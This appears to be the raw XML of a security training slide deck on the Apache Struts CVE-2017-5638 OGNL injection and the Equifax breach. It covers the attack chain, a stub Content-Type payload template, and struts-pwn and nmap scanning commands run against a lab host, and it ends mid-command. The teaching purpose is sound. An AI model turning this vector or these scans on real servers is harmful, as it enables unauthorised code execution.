          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Struts receives an invalid Content-Type HTTP header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The header contains OGNL code, not escaped by application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The parser attempts to process it, throws a tainted error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The function throwing the error processes the OGNL, user input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The OGNL calls Java functions, makes system calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The response to the commands is received in band (in the browser)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote code execution with the privileges of the application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{392280C2-0B91-46C5-8658-FBA8174929F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1226288" y="2584847"/>
            <a:ext cx="8679712" cy="615553"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="182880" bIns="9144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indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>"Content-Type: ${(#_'multipart/Form-data').(OGNL)}"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2424244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B489784-C2E9-43B7-A754-088C41BF9A00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" cap="none" dirty="0"/>
              <a:t>SSTI?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{856156C1-D88A-41C8-ABB6-F9A70A57B9CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The exploit is an example of a Server Side Template Include attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server side code is supposed to process templates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OGNL and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Freemarker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> are both template processing engines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Both can also execute system calls and code on the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker injects into an input field, processed as a template</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Injected OGNL code makes it way to an OGNL sink via tainted user input becoming part of an error handling response which is processed as a template by the OGNL engine. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Oh, it also clears the blacklist of allowed Java functions and allows for fully instrumented exploit code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136398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cap="none" dirty="0"/>
              <a:t>Equifax: Scanning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F00689C-DCED-4068-A88A-08124C547954}"/>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Public disclosure was 2017/09/07</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59B7531C-87E1-4BD2-A457-E455B74D9B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07" y="1828800"/>
            <a:ext cx="12521207" cy="3371094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1987755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62F59-12E9-4152-971E-A5D917AC78C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" cap="none" dirty="0"/>
              <a:t>So, what's the problem?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E035A09E-1482-4F4E-A996-0182EAD7D7B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Just patch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(patch != mitigation) and (mitigation != patch)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WAF? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mod_rewrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>? Replace the jar file? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or upgrade Struts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or rewrite the application… wait, what?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or recompile the application with an updated version of Struts, then test the application, then rewrite the parts that broke, then recompile, then test, then…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This explains why it isn't so simple, it is not like patching Windows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4090935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cap="none" dirty="0"/>
              <a:t>Equifax improvements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Can we list the things that could have been improved?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="923925" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Threat Modeling and Risk Assessment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="923925" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Vulnerability assessment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="923925" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Change/configuration/dependency management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="923925" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Asset categorization, data classification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="923925" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Encrypt data at rest as well as in transit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="923925" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Monitoring, inbound and outbound</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="923925" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Threat hunting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="923925" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Easy to be an armchair quarterback	/backseat driver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12214510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cap="none" dirty="0"/>
              <a:t>./struts-pwn.py --check and the false negative</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="655320" y="1371600"/>
            <a:ext cx="10881360" cy="4038600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This will not work, false negative:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	./struts-pwn.py  -u  struts.sec642.org:8080  --check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To see what is wrong, next can add a proxy to the script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From: https://github.com/mazen160/struts-pwn</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FBFFBBC-1C08-456A-BDE5-CB55858E298D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="464288" y="2895600"/>
            <a:ext cx="11277600" cy="2339102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="182880" bIns="9144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indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ ./struts-pwn.py  -u  struts.sec642.org:8080  --check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[*] URL: http://struts.sec642.org:8080</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[*] Status: Not Affected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[%] Done.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDA50689-4A9C-4AA8-B84F-9C2146494C58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312985" y="4267200"/>
            <a:ext cx="4267200" cy="45720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4672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320" y="475840"/>
            <a:ext cx="10881360" cy="685799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" cap="none" dirty="0"/>
              <a:t>Getting the URL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is the showcase application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We click on: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Upload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Single File Upload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We copy the URL, feed it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to nmap and struts-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(any .action will work)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2A4665A-A60D-4AB7-9571-17C645AED1AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6038850" y="981075"/>
            <a:ext cx="5772150" cy="5316998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36132483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cap="none" dirty="0"/>
              <a:t>nmap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" cap="none" dirty="0" err="1"/>
              <a:t>nse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" cap="none" dirty="0"/>
              <a:t> with and without the path to showcase</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FBFFBBC-1C08-456A-BDE5-CB55858E298D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="464288" y="1215509"/>
            <a:ext cx="11277600" cy="5447645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="182880" bIns="9144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indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> nmap -p 8080 --script=http-vuln-cve2017-5638.nse struts.sec642.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&lt;&lt;snip&gt;&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> nmap -p 8080 --script=http-vuln-cve2017-5638.nse </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>--script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> path=/showcase/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fileupload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
